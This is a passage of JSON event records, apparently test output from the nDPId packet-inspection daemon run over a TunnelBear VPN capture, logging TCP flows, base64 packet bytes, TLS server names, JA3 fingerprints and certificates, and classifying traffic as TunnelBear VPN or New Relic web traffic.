+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524343,"pkt":"ABoRAAACABoRAAABCABFAAA8b31AAEAG5fwKCAABaBFzKLA0Abv3yMj6AAAAAKAC\/\/9HHwAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524345,"pkt":"ABoRAAACABoRAAABCABFAAAoAFhAABAGhTZoEXMoCggAAQG7sDQINzcF98jI+1AS\/\/8YoAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524345,"pkt":"ABoRAAACABoRAAABCABFAAAor3FAAEAGphwKCAABaBFzKLAwAbtQpAj4r1v3CVAQ\/\/8YpQAA"} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524335,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524345,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524346,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524346,"pkt":"ABoRAAACABoRAAABCABFAAA8HIhAAEAGOPIKCAABaBFzKLA6AbvglrsBAAAAAKAC\/\/9sQgAAAgQFtAQCCAoBY6eJAAAAAAEDAwg="} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524346,"pkt":"ABoRAAACABoRAAABCABFAAAoAFpAABAGhTRoEXMoCggAAQG7sDofaUT+4Ja7AlAS\/\/8YmgAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAohANAAEAG0YoKCAABaBFzKLAyAbsgvSOG30Lce1AQ\/\/8YowAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524340,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAob35AAEAG5g8KCAABaBFzKLA0Abv3yMj7CDc3BlAQ\/\/8YoQAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524343,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAoHIlAAEAGOQUKCAABaBFzKLA6AbvglrsCH2lE\/1AQ\/\/8YmwAA"} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524346,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524335,"flow_last_seen":1655734524417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4174,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524417,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server 
CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +01191{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524312,"flow_last_seen":1655734524417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":5990,"flow_avg_l4_payload_len":998,"midstream":0,"thread_ts_msec":1655734524417,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","server_names":"*.tunnelbear.com,tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tunnelbear.com","alpn":"h2,http\/1.1","fingerprint":"52:96:E2:83:CC:15:4E:B3:0F:5B:1D:E2:E8:FF:4E:A9:C4:E9:C0:AF"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524340,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4174,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":36,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524343,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3655,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} 
+01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524346,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3658,"flow_tot_l4_payload_len":4175,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524480,"flow_last_seen":1655734524480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524480,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655734524480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524480,"pkt":"ABoRAAACABoRAAABCABFAAA83gpAAEAGu\/QKCAABovfzvLmIAbsjcXmhAAAAAKAC\/\/+l3QAAAgQFtAQCCAoBY6erAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655734524482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524482,"pkt":"ABoRAAACABoRAAABCABFAAAoAGxAABAGyaei9\/O8CggAAQG7uYjcjoZeI3F5olAS\/\/9T0QAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655734524482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524482,"pkt":"ABoRAAACABoRAAABCABFAAAo3gtAAEAGvAcKCAABovfzvLmIAbsjcXmi3I6GX1AQ\/\/9T0gAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524480,"flow_last_seen":1655734524484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524484,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01183{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524480,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1655734524597,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","server_names":"*.newrelic.com,newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=New Relic, Inc., CN=*.newrelic.com","alpn":"http\/1.1","fingerprint":"90:B0:56:FB:4D:88:5C:EB:F9:79:45:35:26:15:0C:00:F4:08:72:77"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734525210,"flow_last_seen":1655734525210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734525210,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655734525210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734525210,"pkt":"ABoRAAACABoRAAABCABFAAA8oPNAAEAGtIYKCAABaBFzKLBEAbsaEwikAAAAAKAC\/\/\/kSwAAAgQFtAQCCAoBY6hXAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525218,"pkt":"ABoRAAACABoRAAABCABFAAAoAJJAABAGhPxoEXMoCggAAQG7sETl7PdbGhMIpVAS\/\/8YkAAA"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734525218,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734525218,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734525218,"pkt":"ABoRAAACABoRAAABCABFAAA8IBpAAEAGNWAKCAABaBFzKLBGAbuqCIhCAAAAAKAC\/\/\/UtAAAAgQFtAQCCAoBY6hYAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525221,"pkt":"ABoRAAACABoRAAABCABFAAAoAJNAABAGhPtoEXMoCggAAQG7sEZV93e9qgiIQ1AS\/\/8YjgAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525221,"pkt":"ABoRAAACABoRAAABCABFAAAooPRAAEAGtJkKCAABaBFzKLBEAbsaEwil5ez3XFAQ\/\/8YkQAA"} 
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734525210,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734525221,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655734525222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525222,"pkt":"ABoRAAACABoRAAABCABFAAAoIBtAAEAGNXMKCAABaBFzKLBGAbuqCIhDVfd3vlAQ\/\/8YjwAA"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734525218,"flow_last_seen":1655734525224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734525224,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":145,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734525218,"flow_last_seen":1655734525281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734525281,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734525210,"flow_last_seen":1655734525332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734525332,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
